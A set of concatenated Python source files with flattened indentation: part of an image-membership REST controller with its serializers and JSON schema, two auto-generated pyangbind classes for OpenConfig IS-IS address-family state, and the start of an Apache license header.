'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member.status = status
member_repo.save(member)
return member
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to update members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
except ValueError as e:
msg = _("Incorrect request: %s") % utils.exception_to_str(e)
LOG.warning(msg)
raise webob.exc.HTTPBadRequest(explanation=msg)
def index(self, req, image_id):
"""
Return a list of dictionaries indicating the members of the
image, i.e., those tenants the image is shared with.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'members': [
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}, ..
]}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
members = []
for member in member_repo.list():
members.append(member)
return dict(members=members)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to list members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
def show(self, req, image_id, member_id):
"""
Returns the membership of the tenant wrt to the image_id specified.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
return member
except (exception.NotFound, exception.Forbidden):
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
@utils.mutating
def delete(self, req, image_id, member_id):
"""
Removes a membership from the image.
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member_repo.remove(member)
return webob.Response(body='', status=204)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to delete members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
class RequestDeserializer(wsgi.JSONRequestDeserializer):
def __init__(self):
super(RequestDeserializer, self).__init__()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
def create(self, request):
body = self._get_request_body(request)
try:
member_id = body['member']
if not member_id:
raise ValueError()
except KeyError:
msg = _("Member to be added not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
except ValueError:
msg = _("Member can't be empty")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(member_id=member_id)
def update(self, request):
body = self._get_request_body(request)
try:
status = body['status']
except KeyError:
msg = _("Status not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(status=status)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema or get_schema()
def _format_image_member(self, member):
member_view = {}
attributes = ['member_id', 'image_id', 'status']
for key in attributes:
member_view[key] = getattr(member, key)
member_view['created_at'] = timeutils.isotime(member.created_at)
member_view['updated_at'] = timeutils.isotime(member.updated_at)
member_view['schema'] = '/v2/schemas/member'
member_view = self.schema.filter(member_view)
return member_view
def create(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def update(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def index(self, response, image_members):
image_members = image_members['members']
image_members_view = []
for image_member in image_members:
image_member_view = self._format_image_member(image_member)
image_members_view.append(image_member_view)
totalview = dict(members=image_members_view)
totalview['schema'] = '/v2/schemas/members'
body = jsonutils.dumps(totalview, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def show(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
_MEMBER_SCHEMA = {
'member_id': {
'type': 'string',
'description': _('An identifier for the image member (tenantId)')
},
'image_id': {
'type': 'string',
'description': _('An identifier for the image'),
'pattern': ('^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}'
'-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$'),
},
'created_at': {
'type': 'string',
'description': _('Date and time of image member creation'),
# TODO(brian-rosmaita): our jsonschema library doesn't seem to like the
# format attribute, figure out why (and also fix in images.py)
# 'format': 'date-time',
},
'updated_at': {
'type': 'string',
'description': _('Date and time of last modification of image member'),
# 'format': 'date-time',
},
'status': {
'type': 'string',
'description': _('The status of this image member'),
'enum': [
'pending',
'accepted',
'rejected'
]
},
'schema': {'type': 'string'}
}
def get_schema():
properties = copy.deepcopy(_MEMBER_SCHEMA)
schema = daisy.schema.Schema('member', properties)
return schema
def get_collection_schema():
member_schema = get_schema()
return daisy.schema.CollectionSchema('members', member_schema)
def create_resource():
"""Image Members resource factory method"""
deserializer = RequestDeserializer()
serializer = ResponseSerializer()
controller = ImageMembersController()
return wsgi.Resource(controller, deserializer, serializer)
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/afi-safi/af/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines AFI-SAFI State information
"""
__slots__ = (
"_path_helper", "_extmethods", "__afi_name", "__safi_name", "__enabled"
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"afi-safi",
"af",
"state",
]
def _get_afi_name(self):
"""
Getter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
YANG Description: Address-family type.
"""
return self.__afi_name
def _set_afi_name(self, v, load=False):
"""
Setter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_afi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_afi_name() directly.
YANG Description: Address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """afi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="afi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__afi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_afi_name(self):
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_safi_name(self):
"""
Getter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
YANG Description: Subsequent address-family type.
"""
return self.__safi_name
def _set_safi_name(self, v, load=False):
"""
Setter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_safi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_safi_name() directly.
YANG Description: Subsequent address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """safi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="safi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__safi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_safi_name(self):
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
afi_name = __builtin__.property(_get_afi_name)
safi_name = __builtin__.property(_get_safi_name)
enabled = __builtin__.property(_get_enabled)
_pyangbind_elements = OrderedDict(
[("afi_name", afi_name), ("safi_name", safi_name), ("enabled", enabled)]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/afi-safi/af/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines AFI-SAFI State information
"""
__slots__ = (
"_path_helper", "_extmethods", "__afi_name", "__safi_name", "__enabled"
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"afi-safi",
"af",
"state",
]
def _get_afi_name(self):
"""
Getter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
YANG Description: Address-family type.
"""
return self.__afi_name
def _set_afi_name(self, v, load=False):
"""
Setter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_afi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_afi_name() directly.
YANG Description: Address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """afi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="afi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__afi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_afi_name(self):
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_safi_name(self):
"""
Getter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
YANG Description: Subsequent address-family type.
"""
return self.__safi_name
def _set_safi_name(self, v, load=False):
"""
Setter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_safi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_safi_name() directly.
YANG Description: Subsequent address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """safi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="safi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__safi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_safi_name(self):
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
afi_name = __builtin__.property(_get_afi_name)
safi_name = __builtin__.property(_get_safi_name)
enabled = __builtin__.property(_get_enabled)
_pyangbind_elements = OrderedDict(
[("afi_name", afi_name), ("safi_name", safi_name), ("enabled", enabled)]
)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
